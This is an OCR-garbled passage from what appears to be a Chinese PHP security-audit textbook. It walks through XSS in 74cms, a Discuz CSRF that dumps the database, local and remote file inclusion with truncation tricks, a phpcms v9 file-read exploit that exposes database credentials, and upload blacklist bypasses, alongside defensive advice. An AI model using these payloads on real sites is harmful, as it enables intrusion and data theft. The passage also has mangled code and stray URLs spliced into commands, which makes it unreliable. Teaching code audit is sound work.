{ get token () ; check permissions ($ SESSION['admin purview'], "link show") ; require once (QISHI ROOT PATH.'include/page.class.php') ; Soederbysql-" orde 























这 里 是 判断 访问 admin_link.php 这 个 文件 的 时 候 有 没有 act 参 数 ， 没 有 就 给 $act 变 量 赋值 为 list， 即 进入 到 输出 友情 链接 列表 的 代码 : 


























Soffset- (Scurrenpage-1) *$perpage; $link = get links (Soffset, Sperpage, $joinsql.S$wheresql.S$oederbysql) ; $smarty-»assign ('link', $link) ; $smarty-»assign ('page', Spage->show 





get links () 函数 代码 如 下 : 








function get links ($offset, Sperpage, S$get sql- '') 
{ 





























global $db; 
$row arr = array () ; 
Slimit=" LIMIT ".Soffset.', '.Sperpage; 











$result = $db-»query ("SELECT 1.*, c.categoryname FROM ".table ('link') ." AS 1 ".$get_sql.$limit) ; 
while ($row = $db->fetch array ($result) ) 
i 


$row arr[] = $row; 
} 


return $row arr; 








很 清楚 地 看 到 ， 这 是 一 个 从 数据 库 读 取 友 情 链 接 列 表 的 功能 : 


$link = get links (Soffset, Sperpage, $joinsql.$wheresqgl.S$oederbysql) ; 





后 面 的 代码 则 是 将 读 取 的 内 容 以 link/admin_link.htm 为 模板 显示 出 来 。 跟 进 模板 页 看 看 ， 有 一 个 关键 的 代码 片段 如 下 : 


(fif Slist.Notes<>""#} 
<img src-"images/comment alert.gif" border="0" class="vtip" title="{#$list.Not 
{#/if#} 

(if $Slist.link logo<>""#} 
BN style="color: #FF6600" title="<img sro={#$list.link logo#} border=0/>" cla 
{#/i£# } 
{#if $list.display<>"1"#} 
<span style="color: #999999"> [A aban 1]</span> 


其 中 : 





<spanduokan-code-cn">: #FF6600" title="<img src={#$list.link logo#} border=0/>" class="vtip">[logo]</span> 


这 段 代码 是 有 问题 的 ， 这 里 直接 把 显示 logo 的 img 标 签 放 在 span 标 签 的 title 里 面 ， 当 鼠标 滑 过 的 时 候 会 调用 事件 执行 显示 title 即 执行 img 标 签 ， 这 里 的 利用 点 是 供 $list.link_logo 执 可 以 是 HTML 实 体 编 
码 ， 从 而 绕 过 骑士 cms 的 安全 检查 。 目 前 我 们 已 经 找到 一 个 输出 点 了 ， 输 入 点 也 根据 当前 代码 功能 猜 到 是 在 前 台 申 请 链接 的 地 方 ， 利 用 过 程 如 下 ， 在 前 台 申 请 友情 链接 页 
面 http://localhost/74cms/link/add link.php 的 logo 字 段 输 入 





1 oner&#114; or=ale&#114; t (1) 


来 构造 代码 如 下 : 





<spanduokan-code-cn">: #FF6600" title="<img src-1 oner&f114; or-ale&4114; t (1) border-0/»" class-"vtip"»[logo]«/span» 


执行 结果 如 图 4-7 所 示 。 


Ade bc EH In 


# 申请 页 面 : | 网 6 首页 | | deem 求职 首页 资讯 首页 


AERAR: | test | 
HBBE: | test | 


LOGOJN İL : 1 oner&s114;or-ale&st114:t(1) 





SES: CFAH 


申请 说 明 : 





当 管 理 员 在 后 台 查 看 链接 时 触发 漏洞 执行 代码 ， 如 图 4-8 所 示 。 


@ LoadURL http://localhost/74cms/admin/admin_link.php 
Split URL 


1 


阻止 此 页面 创建 更 条 对 话 杠 





4.2.2. ”漏洞 防范 
由 于 XSS 漏 洞 在 不 同 浏览 器 下 有 不 同 的 利用 方式 ， 而 且 特 别 是 业务 上 有 需求 使 用 富 文本 编辑 器 的 时 候 ， 防 御 起 来 就 更 加 复杂 ， 所 以 在 XSS 防 御 这 块 应 该 从 多 个 方面 入 手 ， 尽 量 减少 XSS 漏 洞 。 


4.2.2.1 特殊 字符 HTML 实 体 转 码 


一 般 的 XSS 漏 洞 都 是 因为 没 过 滤 特 殊 字符 ， 导 致 可 以 通过 注入 单 双 引 号 以 及 尖 括 号 等 字符 利用 漏洞 ， 比 如 一 个 图 片 标签 如 下 <img src="$_GET[a]"/> ， 则 可 以 通过 输入 双 引 号 来 闭合 第 一 个 单 引号 利用 
漏洞 ， 防 御 这 类 的 XSS 漏 洞 只 需要 过 滤 掉 相关 的 特殊 字符 即 可 ， 特 殊 字符 列表 如 下 : 


1) 单 引 号 () 
2) 双 引 号 (C) 


3 


尖 括 号 (<>) 


— 


4) RHI (X) 


— 


5) 冒号 (: ) 


6) and 符 (&) 


— 


7) #5 (ff) 


还 有 两 个 问题 ， 这 些 字符 应 该 怎么 过 滤 ， 什 么 时 候 过 滤 ” 为 了 保证 数据 原始 性 ， 最 好 的 过 滤 方 式 是 在 输出 和 二 次 调用 的 时 候 进 行 如 HTML 实 体 一 类 的 转 码 ， 防 止 脚本 注入 的 问题 。 


42.2.2 ”标签 事件 属性 黑白 名 单 


上 面 我 们 提 到 过 渡 特 殊 字符 来 防止 XSS 漏 洞 ， 实 际 上 即使 过 滤 了 也 同样 可 能 会 被 绕 过 ， 比 如 利用 跟 宽 字 节 注 入 一 样 的 方式 来 吃 掉 反 斜 杠 ， 再 利用 标签 的 事件 来 执行 js 代码 ， 面 对 这 样 的 情况 ， 我 们 还 得 加 
标签 事件 的 黑 名 单 或 者 白 名 单 ， 这 里 更 推荐 用 白 名 单 的 方式 ， 实 现 规则 可 以 直接 用 正则 表达 式 来 匹配 ， 如 果 匹 配 到 的 事件 不 在 白 名 单列 表 ， 就 直接 拦截 掉 ， 而 不 是 蔡 换 为 空 。 


4.3 CSRFifsilal 


CSRF 全 称 为 Cross-site request forgery， 跨 站 请 求 伪 造 。 说 白 一 点 就 是 可 以 劫持 其 他 用 户 去 进行 一 些 请 求 ， 而 这 个 CSRF 的 危害 性 就 看 当前 这 个 请 求 是 进行 什么 操作 了 。 


而 CSRF 是 怎么 一 个 攻击 流程 呢 ? 举 一 个 最 简单 的 例子 ， 比 如 直接 请 求 http://x.com/del.php?id=1 可 以 删除 ID 为 1 的 账号 ， 但 是 只 有 管理 员 有 这 个 删除 权限 ， 而 如 果 别 人 在 其 他 某 个 网 站 页 面 加 入 <img 
src=”http://x.com/del.php?id=1”> 再 把 这 个 页 面 发 送 给 管理 员 ， 只 要 管理 员 打 开 这 个 页 面 ， 同 时 浏览 器 也 会 利用 当前 登录 的 这 个 管理 员 权 限 发 出 http://x.com/del.php?id=1 这 个 请 求 ， 从 而 动 持 了 这 
个 账号 做 一 些 攻击 者 没有 权限 做 的 事情 。 


上 面 举 的 这 个 例子 只 是 其 中 一 个 场景 ， 更 严重 的 像 添加 管理 员 账 号 、 修 改 网 站 配置 直接 写 入 webshell 等 等 都 有 很 多 案例 。 


4.3.1 挖掘 经 验 


CSRF 主 要 是 用 于 越权 操作 ， 所 有 漏洞 自然 在 有 权限 控制 的 地 方 ， 像 管理 后 台 、 会 员 中 心 、 论 坛 帖子 以 及 交易 管理 等 ， 这 几 个 场景 里 面 ， 管 理 后 台 又 是 最 高 危 的 地 方 ， 而 CSRF 又 很 少 被 关注 到 ， 因 此 至 
今 还 有 很 多 程序 都 存在 这 个 问题 。 我 们 在 挖掘 CSRF 的 时 候 可 以 先 搭建 好 环境 ， 打 开 几 个 有 非 静态 操作 的 页 面 ， 抓 包 看 看 有 没有 token， 如 果 没 有 token 的 话 ， 再 直接 请 求 这 个 页 面 ， 不 带 referer。 如 果 返 回 
的 数据 还 是 一 样 的 话 ， 那 说 明 很 有 可 能 有 CSRF 漏 洞 了 ， 这 个 是 一 个 黑 盒 的 挖掘 方法 ， 从 白 盒 角度 来 说 的 话 ， 只 要 读 代码 的 时 候 看 看 几 个 核心 文件 里 面 有 没有 验证 token 和 referer 相 关 的 代码 ， 这 里 的 核心 广 
件 指 的 是 被 大 量 文 件 引 用 的 基础 文件 ， 或 者 直接 搜 "token "这 个 关键 字 也 能 找 ， 如 果 在 核心 文件 没有 ， 再 去 看 看 你 比较 关心 的 功能 点 的 代码 有 没有 验证 。 


Discuz CSRF 备 份 拖 库 分 析 


下 面 我 们 来 分 析 一 个 Discuz CSRF 可 以 直接 脱 裤 的 漏洞 ， 这 个 漏洞 影响 非常 大 ， 漏 洞 在 刚 公 开 的 时 候 导 致 了 大 量 的 Discuz 论 坛 被 拖 库 ， 漏 洞 来 源 乌云 缺陷 编号 : WooYun-2014-64886， 作 者 是 跟 笔 者 
同一 个 team (safekey) 的 matt。 


漏洞 文件 在 source/admincp/admincp db.php 第 30 行 开始 : 





if (! Sbackupdir) {$backupdir = random (6) ; @mkdir ('./data/backup '.$backupdir, 0777) ; 
// 文 件 夹 名 是 六 位 随机 数 C: : t ('common setting') -»update ('backupdir', $backupdir) ; /) else { 









































// 这 边 也 没有 做 fromhash 的 验证 DB: : query ('SET SQL QUOTE SHOW CREATE=0 SILENT') ; if (! $ GET['filename'] || ! preg match ('/^[NwN ]4$/', $ GET['filename']) ) { cpmsg ('de 
$sqldump .= sqldumptablestruct (Stable) ; 
} } Scomplete = TRUE; for (; $complete && $tableid < count (Stables) && strlen ($sqldump) + 500 < $ GET ['sizelimit'] * 1000; Stableidt+) { 














在 这 个 漏洞 中 ， 由 于 表 名 和 文件 都 是 直接 GET 提 交 的 ， 目 录 名 由 一 个 固定 的 backup 加 上 一 个 六 位 数字 组 成 ， 备 份 成 功 后 可 以 直接 爆破 ， 最 终 利 用 可 以 直接 在 论坛 发 帖 加 入 下 面 代码 即 可 : 





«img src-"http: //127.0.0.1/discuz/admin.php? action-db&operation-export&setup-l&scrolltop-&anchor-&type-custom&customtables£5B£5D- (X.£ )&method-multivol&sizelimit-2048&extendir 








利用 截图 ， 如 图 4-9 所 示 。 
4.3.2 ”漏洞 防范 


防御 CSRF 漏 洞 的 最 主要 问题 是 解决 可 信 的 问题 ， 即 使 是 管理 员 权 限 提交 到 服务 器 的 数据 ， 也 不 一 定 是 完全 可 信 的 ， 所 以 针对 CSRF 的 防御 有 以 下 两 点 : 1) 增加 token/referer 验 证 避免 img 标 签 请 求 的 水 
坑 攻 击 ，2) 增加 验证 码 。 


4.3.2.1 Token 验 证 


Token 翻 译 中 文 为 “标志 ”， 在 计算 机 认证 领域 叫 令 牌 。 利 用 验证 Token 的 方式 是 目前 使 用 的 最 多 的 一 种 ， 也 是 效果 最 好 的 一 种 ， 可 以 简单 理解 成 在 页 面 或 者 cookie 里 面 加 一 个 不 可 预测 的 字符 串 ， 服 
务 器 在 接收 操作 请 求 的 时 候 只 要 验证 下 这 个 字符 串 是 不 是 上 次 访问 留 下 的 即 可 判断 是 不 是 可 信 请 求 ， 因 为 如 果 没 有 访问 上 一 个 页 面 ， 是 无 法 得 到 这 个 Token 的 ， 除 非 结合 XSs 漏 洞 或 者 有 其 他 手段 能 获得 通 
信 数 据 。 
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图 4-9 (引用 自 乌云 网 ) 


Token 实 现 测试 代码 如 下 : 


«? php 
session start () ; 

function set token () { 

$ SESSION['token'] = md5 (time () «rand (1, 1000) ) ; 
} 
function check token () { 

if (isset ($ POST['token']) &&$ POST['token'] === $ SESSION['token']) 
{ 


} 
else{ 
return false; 















































return true; 











} 


} 
if (isset ($ SESSION['token']) &&check token () ) { 
echo "success"; 








} 
else{ 
echo "failed"; 





} 

set token () ; ? > 

<form method="post"> 
<input type="hidden" name="token" value="<? =$ SESSION['token']? >"> 
<input type="submit"/> 

</form> 























运行 结果 ， 如 果 请 求 里 面 的 Token 值 跟 服务 器 端的 一 致 ， 则 输出 "success" ， 否 则 输出 “failed” , 


4.3.2.2 ”验证 码 验证 


验证 码 验 证 没有 Token 那 么 实用 ， 考 虑 到 用 户 体验 ， 不 可 能 让 用 户 每 个 页 面 都 去 输入 一 次 验证 码 ， 这 估计 用 户 得 疯 掉 ， 所 以 一 般 这 种 方式 只 用 在 敏感 操作 的 页 面 ， 比 如 像 登 录 页 面 ， 实 现 方式 跟 Token 
差不多 ， 这 里 就 不 再 详细 给 出 代码 。 


第 5 章 ISHS ( 进 阶 篇 ) 


在 本 章 我 们 会 介绍 文件 操作 、 系 统 命令 执行 以 及 代码 执行 有 关 的 漏洞 ， 会 从 应 用 接触 到 更 多 系统 以 及 中 间 件 特性 有 关 的 东西 ， 所 以 会 相当 有 意思 ， 进 入 到 本 书 的 进 阶 篇 ， 是 不 是 更 兴奋 呢 ? 


5.1 “文件 操作 局 洞 


文件 操作 包括 文件 包含 、 文 件 读 取 、 文 件 删除 、 文 件 修改 以 及 文件 上 传 ， 这 几 种 文件 操作 的 漏洞 有 部 分 的 相似 点 ， 但 是 每 种 漏洞 都 有 各 自 的 漏洞 函数 以 及 利用 方式 ， 下 面 我 们 来 具体 分 析 下 它们 的 形成 
原因 、 挖 掘 方 式 以 及 修复 方案 。 


5.1.1. 文件 包含 漏洞 


PHP 的 文件 包含 可 以 直接 执行 包含 文件 的 代码 ， 包 含 的 文件 格式 是 不 受 限 制 的， 只 要 能 正常 执行 即 可 。 文 件 包含 又 分 为 本 地 文件 包含 (local file include) 和 远程 文件 包含 (remote file include) , Pi 
名 思 义 就 能 理解 它们 的 差别 在 哪 ， 而 不 管 哪 种 都 是 非常 高 危 的 ， 渗 透 过 程 中 文件 包含 漏洞 大 多 可 以 直接 利用 获取 webshell。 文 件 包 含 函数 有 include () . include once () 、require () 和 
require once () ， 它 们 之 间 的 区 别 在 于 : include () 和 include_once () 在 包含 文件 时 即使 遇 到 错误 ， 下 面 的 代码 依然 会 继续 执行 ; 而 require () 和 require_once () 则 会 直接 报错 退出 程序 。 


5.1.1.1 ”挖掘 经 验 


文件 包含 漏洞 大 多 出 现在 模块 加 载 、 模 板 加 载 以 及 cache 调 用 的 地 方 ， 比 如 传 入 的 模块 名 参数 ， 实 际 上 是 直接 把 这 个 拼接 到 了 包含 文件 的 路 径 中 ， 比 如 像 espcms 的 代码 : 


Sarchive = indexget ('archive', 'R') ; 

Sarchive = empty ($archive) ?  'adminuser' : archive; 
action = indexget ('action', 'R') ; 

$action = empty ($action) ?  'login' : $action; 

include admin ROOT . adminfile . "/control/Sarchive.php"; 











传 入 的 archive 参 数 就 是 被 包含 的 文件 名 ， 所 以 我 们 在 挖掘 文件 包含 漏洞 的 时 候 可 以 先 跟踪 一 下 程序 运行 流程 ， 看 看 里 面 模块 加 载 时 包含 的 文件 是 否 可 控 ， 另 外 就 是 直接 搜索 include () . 
include once () 、require () fürequire once () 这 四 个 函数 来 回溯 看 看 有 没有 可 控 的 变量 ， 它 们 的 写法 可 以 在 括号 里 面 写 要 包含 的 路 径 ， 也 可 以 直接 用 空格 再 跟 路 径 。 一 般 这 类 都 是 本 地 文件 包含 ， 
大 多 是 需要 截断 的 ， 截 断 的 方法 下 面 我 们 再 细 说 。 


5.1.1.2 ”本 地 文件 包含 


本 地 文件 包含 (local file include, LFI) 是 指 只 能 包含 本 机 文件 的 文件 包含 漏洞 ， 大 多 出 现在 模块 加 载 、 模 板 加 载 和 cache 调 用 这 些 地 方 ， 渗 透 的 时 候 利用 起 来 并 不 鸡肋 ， 本 地 文件 包含 有 多 种 利用 方 
式 ， 比 如 上 传 一 个 允许 上 传 的 文件 格式 的 文件 再 包含 来 执行 代码 ， 包 含 PHP 上 传 的 临时 文件 ， 在 请 求 URL 或 者 ua 里 面 加 入 要 执行 的 代码 ，WebSserveri 记 录 到 日 志 后 再 包含 WebServer 的 日 志 ， 还 有 像 Linux 
下 可 以 包含 /proc/self/environ 文 件 。 


测试 代码 1.php 如 下 所 示 : 


<? php 

// 初 始 化 http://www.hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/15497/OEBPS/Text/. .http://www.hzcourse.com/resource/readBook?path=/openresources/t 
define ("ROOT", dirname ( FILE ) .'/') ; i 

// 加 载 模块 

$mod = $ GET['mod']; 

echo ROOT.S$mod.'.php'; 

include (ROOT.$mod.'.php') ; ? > 















































我 们 在 同 目录 下 2.php 写 入 如 下 代码 : 
<? php phpinfo () ; ? > 


请 求 /1.php? mod=2 执 行 结果 如 图 5-1 所 示 。 


http://localhost/test/1.php?mod=2 


Enable Post data [© Enable Referrer 











D: \wew\test/2. php 





1. 远 程 文件 包含 


远程 文件 包含 (remote file include, RFI) 是 指 可 以 包含 远程 文件 的 包含 漏洞 ， 远 程 文件 包含 需要 设置 allow_url_include=On，PHP5.2 之 后 这 个 选项 的 可 修改 范围 是 PHP_INI_ALL。 四 个 文件 包含 的 
函数 都 支持 HTTP、FTP 等 协议 ， 相 对 于 本 地 文件 包含 ， 它 更 容易 利用 ， 不 过 出 现 的 频率 没有 本 地 文件 包含 多 ， 偶 尔 能 挖 到 ， 下 面 我 们 来 看 看 基于 HTTP 协 议 测试 代码 : 


«? php 
include ($ GET['url']) ; ? > 


利用 则 在 GET 请 求 url 参 数 里 面 传 入 "http://remotehost/2.txt"， 其 中 远程 机 器 上 的 2.txt 是 一 个 内 容 为 <? php phpinfo () ; ? >。 访问 后 返回 本 机 的 phpinfo 信 息 。 


远程 文件 包含 还 有 一 种 PHP 输 入 输出 流 的 利用 方式 ， 可 以 直接 执行 POST 代 码 ， 这 里 我 们 仍然 用 上 面 这 个 代码 测试 ， 只 要 执行 POST 请 求 1.php? a=php: //input，POST 内 容 为 PHP 代 码 "<? php 
phpinfo () ; ? >" 即 可 打印 出 phpinfo 信 息 ， 如 图 5-2 所 示 。 


2. 文 件 包含 截断 


大 多 数 的 文件 包含 漏洞 都 是 需要 截断 的 ， 因 为 正常 程序 里 面包 含 的 文件 代码 一 般 是 像 include (BASEPATH.$mod.'php') 或 者 include ($mod.'.php') 这 样 的 方式 ， 如 果 我 们 不 能 写 入 以 .php 为 扩展 名 
的 文件 ， 那 我 们 是 需要 截断 来 利用 的 。 


Load URL — http;/localhost/test/1.php?a-php://input 


<?php phpinfo();?>| 





图 5-2 
下 面 我 们 就 来 详细 说 一 下 各 种 截断 方式 。 
第 一 种 方式 ， 利 用 %00 来 截断 ， 这 是 最 古老 的 一 种 方法 ， 不 过 在 笔者 做 渗透 测试 的 过 程 中 ， 发 现 目 前 还 是 有 很 多 企业 的 线 上 环境 可 以 这 么 利用 。%00 截 断 受 限于 GPC 和 addslashes 等 函数 的 过 滤 ， 也 就 


是 说 ， 在 开启 GPC 的 情况 下 是 不 可 用 的 ， 另 外 在 PHP5.3 之 后 的 版 本 全 面 修复 了 文件 名 %00 截 断 的 问题 ， 所 以 在 5.3 之 后 的 版 本 也 是 不 能 用 这 个 方法 截断 的 。 下 面 我 们 来 演示 一 下 %00 截 断 ， 测 试 代码 1.php: 





«? php 
include $ GET['a'].'.php'? » 


测试 代码 2.txt 内 容 为 phpinfo。 


请 求 http://localhost/test/1.php? a=2.txt%00 即 可 执行 phpinfo 的 代码 如 图 5-3 所 示 。 











第 二 种 方式 ， 利 用 多 个 英文 句号 (.) 和 反 和 斜 枉 (/) 来 截断 ， 这 种 方式 不 受 GPC 限 制 ， 不 过 同样 在 PHP 5.3 版 本 之 后 被 修复 。 下 面 让 我 们 来 演示 一 下 : 


测试 代码 如 下 : 


«? php 

S$str-''; 

for ($120; $i<=240; $i++) { 
Sstr .= '.'; 

} 

sstr= '2.txt'.S$strj 

echo Sstr; 

include Sstr.'.php'; ? > 


我 在 Windows 下 测试 是 240 个 连接 的 点 (.) 能 够 截断 ， 同 样 的 点 C) DRHE (/) 也 是 240 个 能 够 截断 ，Linux 下 测试 的 是 2038 个 /. 组 合 才能 截断 。 


第 三 种 方式 ， 远 程 文件 包含 时 利用 问号 (? ) 来 伪 截 断 ， 不 受 GCPC 和 PHP 版 本 限制 ， 只 要 能 返回 代码 给 包含 图 数 ， 它 就 能 执行 ， 在 HTTP 协 议 里 面 访问 http://remotehost/1.txt 和 访 
问 http://remotehost/1.txt?.php 返 回 的 结果 是 一 样 的 ， 因 为 这 时 候 WebServer 把 问号 (? ) 之 后 的 内 容 当 成 是 请 求 参 数 ， 而 txt 不 在 Webserver 里 面 解析 ， 参 数 对 访问 1.txt 返 回 的 内 容 不 影响 ， 所 以 就 实现 


了 伪 截 断 。 


测试 代码 如 下 : 


«? php 
include $ GET['a'].'.php'; 





请 求 /1.php? a=http://remotehost/2.txt? 2.txt 内 容 同样 为 phpinfo 的 代码 ， 请 求 之 后 会 打印 出 phpinfo 信 息 。 
3.Metinfo 文 件 包 含 漏 洞 分 析 
这 里 举例 笔者 在 2012 年 时 找到 的 metinfo 企 业 网 站 管理 系统 中 的 一 个 文件 包含 漏洞 ， 当 时 本 漏洞 提交 给 官方 已 经 修复 。 


漏洞 出 现在 文件 /message/index.php， 这 个 地 方 调用 模块 方式 是 直接 从 GET 请 求 中 获取 模块 名 ， 拼 接 到 require_once 函 数 中 ， 因 此 模块 名 可 控 导 致 了 可 以 远程 包含 文件 ， 代 码 如 下 : 





if (! Smetid) 
Smetid='index'; 

if (Smetid! -'index') { 
require once Smetid.'.php'; 
Jelse( 

/* 省 略 */ 

} 








$metid 是 从 GET 提 交 的 ， 这 段 代 码 的 意思 是 ， 如 果 提交 的 参数 metid 不 是 index， 则 执行 require_once$metid.".php' 去 包含 加 载 模块 文件 ， 这 里 可 以 用 我 们 上 面 说 的 三 种 方式 来 利用 ， 假 设 
allow_url_include=on， 只 要 在 远程 写 一 个 1.txt 的 文件 ， 利 用 问号 来 伪 截 断 即 可 ， 或 者 搭 一 个 不 解析 PHP 的 WebServer， 访 问 的 时 候 不 加 文件 扩展 名 ， 这 里 给 出 当时 写 文档 时 留 的 一 个 截图 ， 如 图 5-4 所 


人 小。 


| CEDREREE2 Q) 一 Mozilla Firefox 
cade TFC ee) Bee) ALG) BEG IRM) ew 
J phpinfo () X || 1403 Forbidden 


192.188.0. 164:81/MetInfob5. Ü/message/index.php?metid-http://localhoszt:88/1 


Windows NT WS03-20120324AX 5.2 build 3790 
Build Date May 2 2008 18:01:20 


eseript /nologo configure. js "--enable-snapshot-build" “--wi 
“—-with-extra-includes=C: Program Files (x86) \Microsoft SDK\ 
\PROGRA “2 \MICROS “2 \VC9S\ATLVINCLUDE; C: \PROGRA™2 \MICROS “2 \VC¢ 
\PROGRA 24MICROS 2XVCOSNMFCNINCLUDE" “--with-extra-libs=C: \P 
(x86) \Microsoft SDKMLib;C: \PROGRA 23MICROS 24\VC98\LIB-C: \PRO 
\VC98 \MFC LIB” 








5.1.2 文件 读 取 (下载 ) 漏洞 


文件 读 取 漏洞 与 下 载 漏洞 差别 不 大 ， 这 里 就 合并 在 一 起 说 ， 文 件 读 取 漏洞 在 很 多 大 型 应 用 上 都 出 现 过 ， 印 象 比 较 深 的 是 2012 年 的 时 候 phpcmsv9 的 任意 文件 读 取 ， 可 以 直接 读 取 数据 库 配 置 文件 ， 当 时 
也 是 有 很 多 企业 因为 这 个 漏洞 被 入 侵 。 这 个 漏洞 很 容易 理解 ， 部 分 程序 在 下 载 文件 或 者 读 取 显 示 文 件 的 时 候 ， 读 取 文 件 的 参数 filename 直 接 在 请 求 里 面 传递 ， 后 台 程 序 获取 到 这 个 文件 路 径 后 直接 读 取 返 
回 ， 问 题 在 于 这 个 参数 是 用 户 可 控 的 ， 可 以 直接 传 入 想 要 读 取 的 文件 路 径 即 可 利用 。 


挖掘 经 验 : 文件 读 取 的 漏洞 寻找 起 来 很 是 比较 容易 的 ， 一 种 方式 是 可 以 先 黑 盒 看 看 功能 点 对 应 的 文件 ， 再 去 读 文 件 ， 这 样 找 起 来 会 比较 快 。 另 外 一 种 方式 就 是 去 搜索 文件 读 取 的 函数 ， 看 看 有 没有 可 以 
直接 或 者 间接 控制 的 变量 ， 文 件 读 取 函 数列 表 如 下 : file get contents () 、highlight file () 、fopen () 、readfile () 、fread () 、fgetss () 、fgets () . parse ini file () 、 
show source () . file () ， 除 了 这 些 正常 的 读 取 文 件 的 函数 之 外 ， 另 外 一 些 其 他 功能 的 函数 也 一 样 可 以 用 来 读 取 文 件 ， 比 如 文件 包含 函数 include 等 ， 可 以 利用 PHP 输 入 输出 流 php: //filter/ 来 读 取 文 


件 。 
phpcms 任 意 文件 读 取 分 析 
这 里 介绍 phpcms v9 的 任意 文件 读 取 漏洞 ， 漏 洞 作者 为 safekey team 核 心 成 员 zvall。 


漏洞 位 于 文件 /phpcms/modules/search/index.phppublic 的 get_suggest keyword 函数， 代码 如 下 : 


public function public get suggest keyword () { 
url = $ GET['url']."&g-'.S GET['q']; 

res = @file get contents ($url) ; 

if (CHARSET | = 'gbk') 

$res = iconv ('gbk', CHARSET, $res) ; 

} 


echo $res; 





Xr ur 














这 里 可 以 看 到 该 函数 直接 从 GET 参 数 里 面 获取 要 读 取 的 URL， 然 后 使 用 file_get_contents 卫 数 来 读 取 内 容 ， 不 过 这 里 有 一 点 要 说 一 下 ， 如 果 直 接 提 人 交 ?”url=&q=1.php 我 们 打印 出 来 url 变 量 可 以 看 到 值 
为 “&q=1.php”， 带 到 函数 里 面 则 是 file_ get contents ( “&q=1.php" ) ， 这 样 是 读 不 到 当前 文件 的 ， 需 要 ? url=&q=http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach_ebook/uncompressed/15497/OEBPS/Text/../http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach_ebook/uncompressed/15497/OEBPS/Text/../1.phpix##S DOM" http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach_ ebook/uncompressed/15497/OEBPS/Text/../”， 把“&q=” 当 成 目录 来 跳 过 ， 最 终 这 个 漏洞 读 取 数据 库 配 置 文 件 的 EXP 为 : 


/index.php? m=search&c=index&a=public get suggest keyword&url-&q-http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/15497/OEBPS/Text/../http 


利用 截图 如 图 5-5 所 示 。 


c & SQL- XSS- Encryption: Encoding Other 


© LoadURL hitp://localhost/phpcmsv9gbk//index.php?m=search&c=index& 

^ a-public get suggest keyword&url-asdf&q-../../phpsso server/caches/configs 

$^ SpltURL ` | 
/database.php 


+) Execute 
Enable Post data Enable Referrer 


array ( hostname => ‘localhost’, database => ` phpcmsv9 , ` username’ 
"root, password => 123456, 'tablepre => 'v9 sso ', ‘charset’ => 
‘utf8 , “type => mysql, ‘debug => true, 'pconnect => 0, 'autoconnect 


= 0) )}> > 





图 5-5 


5.1.3 ”文件 上 传 漏洞 


文件 上 传 漏洞 是 出 现 最 早 的 漏洞 ， 也 是 最 容易 理解 的 漏洞 ， 应 用 程序 都 是 代码 写 的 ， 代 码 都 是 写 在 文件 里 面 执行 的 ， 如 果 能 把 文件 上 传 到 管理 员 或 者 应 用 程序 不 想 让 你 上 传 的 目录 ， 那 就 是 存在 文件 上 
传 漏洞 。 注 意 这 里 并 不 是 说 一 定 是 上 传 一 个 Webserver 可 以 解析 的 代码 文件 到 可 以 解析 的 目录 ， 漏 洞 的 定义 是 做 攻击 目标 不 想 让 你 做 的 事情 ， 而 你 又 发 现 可 以 做 到 。 


文件 上 传 漏洞 跟 SQL 注 入 一 样 丰富 精彩 ， 有 很 多 漏洞 场景 和 利用 方式 。 在 早期 Web 安 全 不 太 普 及 的 时 候 ， 文 件 上 传 漏洞 大 多 是 没有 限制 文件 格式 导致 可 以 直接 上 传 文件 ， 到 近 几 年 这 类 例子 已 经 很 少 
见 ， 目 前 存在 较 多 的 是 黑 名 单 过 滤 人 存在 绕 过 导致 文件 上 传 漏洞 。 


挖掘 经 验 : 文件 上 传 漏洞 比较 好 理解 ， 同 样 挖 掘 起 来 也 比较 简单 ， 一 般 应 用 可 以 上 传 文件 的 点 比较 少 ， 其 次 是 目前 大 多 Web 应 用 都 是 基于 框架 来 写 ， 上 传 的 点 都 是 调用 的 同一 个 上 传 类 ， 上 传 函 数 又 只 
有 move_uploaded file () 这 一 个 ， 所 以 文件 上 传 漏洞 在 代码 审计 的 时 候 ， 最 快 的 方法 就 是 直接 去 搜索 move_uploaded file () 函数 ， 再 去 看 调用 这 个 函数 上 传 文件 的 代码 存 不 存在 未 限制 上 传 格式 或 者 
可 以 绕 过 ， 其 中 间 题 比较 多 的 是 黑 名 单 限制 文件 格式 以 及 未 更 改 文件 名 的 方式 ， 没 有 更 改 文件 名 的 情况 下 ， 在 Apache 利 用 其 向 前 寻找 解析 格式 和 11S6 的 分 号 解析 bug 都 可 以 执行 代码 。 


1. 未 过 滤 或 本 地 过 滤 


未 过 滤 和 本 地 过 滤 共 同 点 是 在 服务 器 端 都 未 过 滤 ， 这 个 未 过 滤 指 的 是 没 限制 任何 格式 的 文件 上 传 ， 就 是 一 个 最 简单 的 文件 上 传 功能 ， 上 传 的 时 候 直接 上 传 PHP 格 式 的 文件 即 可 利用 ， 它 的 代码 简化 之 后 
就 直接 是 下 面 这 样 : 





<? php 
move uploaded file ($ FILES["file"]["tmp name"], $ FILES["file"]["name"]) ; ? > 

















move uploaded file 函 数 直接 把 上 传 的 临时 文件 copy 到 了 新 文件 。 

2. 黑 名 单 扩展 名 过 滤 

黑 名 单 扩展 名 是 前 几 年 用 得 比较 多 的 验证 方式 ， 后 来 因为 绕 过 多 了 ， 就 慢 慢 改 用 了 白 名 单 。 
黑 名 单 的 缺点 有 以 下 几 个 。 


1) 限制 的 扩展 名 不 够 全 ， 上 传 文件 格式 不 可 预测 的 性 质 导 致 了 可 能 会 有 漏网 之 鱼 。 PHP 能 够 在 大 多 数 的 Webserver 上 配置 解析 ， 不 同 的 Webserver 默 认 有 不 同 的 可 以 解析 的 扩展 名 ， 典 型 的 l1S 默 认 是 
支持 解析 ASP 语 言 的 ， 不 过 在 IIS 下 执行 ASP 的 代码 可 不 止 .asp 这 个 扩展 名 ， 还 有 cqdx、asa、cer 等 ， 如 果 代 码 里 面 没 有 把 这 些 写 全 ， 一 旦 漏 掉 一 个 就 相当 于 没 做 限制 。 我 们 来 看 看 PHPCM SSvV9 里 面 限 制 的 : 











$savefile = preg replace ("/ (php|phtml|php3|php4|jsplexe|dll|asplcer|asa|shtml|shtm |aspx|asax|cgilfcgilpl) (\.|$) /i", ™ \\1\\2", Ssavefile) ; 











很 明显 我 们 上 面 说 的 cdx 不 在 这 个 列表 里 面 。 


